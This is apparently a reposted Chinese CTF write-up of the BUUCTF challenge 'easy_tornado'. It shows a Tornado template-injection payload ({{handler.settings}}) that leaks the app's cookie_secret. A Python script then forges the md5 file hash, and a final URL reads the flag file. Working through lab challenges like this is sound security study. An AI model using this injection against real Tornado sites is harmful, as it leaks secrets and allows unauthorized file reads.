码迷,mamicode.com
首页 > 其他好文 > 详细

护网杯 2018 easy_tornado 1【BUUCFT】【模板注入】

时间:2020-07-20 13:32:20      阅读:111      评论:0      收藏:0      [点我收藏+]

标签:pil   文件的   lang   使用   怎么   erro   ash   查询   本地   

三个文件的全部信息

flag in /fllllllllllllag
render
md5(cookie_secret+md5(filename))

看了cookie 未找到cookie_secret

查询资料: [原题复现]2018护网杯(WEB)easy_tornado(模板注入)

获取cookie_secret

error?msg={{handler.settings}}
{‘autoreload‘: True, ‘compiled_template_cache‘: False, ‘cookie_secret‘: ‘3fa1222e-6726-43dd-9d06-f443a417e574‘}

python 构造 MD5 强烈建议使用 python 本地md5 加密 我在线加密怎么都构建不出来

import hashlib
hash = hashlib.md5()

filename = ‘/fllllllllllllag‘
cookie_secret = "3fa1222e-6726-43dd-9d06-f443a417e574"
hash.update(filename.encode(‘utf-8‘))
s1 = hash.hexdigest()
hash = hashlib.md5()
hash.update((cookie_secret+s1).encode(‘utf-8‘))
print(hash.hexdigest())

getFlag

http://8b5600f7-a54c-4356-aa62-ddf820dbe619.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=4edb201c923cd9abf13be0e6372e6273
/fllllllllllllag
flag{e0bdd279-6de9-4af3-a3c2-eb36b7b24a89}

护网杯 2018 easy_tornado 1【BUUCFT】【模板注入】

标签:pil   文件的   lang   使用   怎么   erro   ash   查询   本地   

原文地址:https://www.cnblogs.com/borber/p/tornado1.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!